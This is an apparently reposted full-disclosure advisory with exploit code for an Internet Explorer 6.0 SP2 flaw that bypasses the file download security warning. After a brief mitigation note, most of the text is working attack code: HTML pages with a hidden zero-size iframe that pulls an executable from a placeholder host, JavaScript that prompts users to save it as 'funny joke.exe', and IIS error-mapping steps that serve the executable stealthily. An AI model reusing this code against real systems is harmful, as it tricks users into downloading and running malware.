Internet Explorer 6.0 SP2 File Download Security Warning Bypass Exploit

信息来源：0day

Microsoft Internet Explorer (including IE for Windows XP SP2) is reported vulnerable to a file download security warning
bypass. This unpatched flaw may be exploited to download a malicious executable file masqueraded as a HTML file.

Secunia did not release the technical details (aka Security by Obscurity) thus we publish this page (aka Full Disclosure)
Solution

[EN] Disable Active Scripting and the "Hide file extensions for known file types" option [Tools->Folder Options->View]
[FR] D閟activez Active Scriptig et l'option "Masquer les extensions des fichiers dont le type est connu [Panneau de
configuration -> Options des dossiers -> Affichage]


Credits : go to cyber flash


How does it work ? A.K.A Exploit

The following code requires no special server setup, and should work from any webpage that IE 6.0 fetches:
<html>
<body>
<iframe src=&#39;http://domain.com/v.exe?.htm&#39; name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand(&#39;SaveAs&#39;,1,&#39;funny joke.exe&#39;);">
here</a>.
</body>
</html>

Also, here&#39;s an example that requires modifying the IIS Error Mapping Properties (see below):

<html>
<body>
<iframe src=&#39;vengy404.htm&#39; name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand(&#39;SaveAs&#39;,1,&#39;funny joke.exe&#39;);">
here</a>.
</body>
</html>

Steps to configure IIS:

Launch Internet Information Services manager.
Under the &#39;Custom Errors&#39; tab, modify the Error Mapping Properties as follows:

Error Code: 404
Default Text: Not Found
Message Type: URL
URL: /v.exe (name of the executable)
Within the HTML page, insert an IFRAME as follows:

<iframe src=&#39;vengy404.htm&#39; name="NotFound" width="0" height="0"></iframe>

The file &#39;vengy404.htm&#39; intentionally doesn&#39;t exist on the server, so it will trigger a 404 error message as defined above. But, the javascript code below references the stealthy v.exe data within the frame &#39;NotFound&#39; and is linked to &#39;funny joke.exe&#39; when prompted to save the file:

javascript:document.frames.NotFound.document.execCommand(&#39;SaveAs&#39;,1,&#39;funny joke.exe&#39;);